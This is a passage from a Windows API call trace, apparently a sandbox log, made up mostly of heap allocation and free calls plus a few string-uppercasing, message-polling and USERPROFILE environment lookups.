cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.725] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0121.725] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0121.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0121.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0121.726] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0121.726] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0121.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0121.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0121.727] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0121.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0121.728] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0121.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0121.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0121.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0121.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0121.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0121.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0121.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0121.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0121.730] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0121.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0121.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0121.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0121.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0121.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0121.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0121.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0121.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0121.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0121.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.731] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0121.731] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0121.731] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0121.732] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.732] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.733] 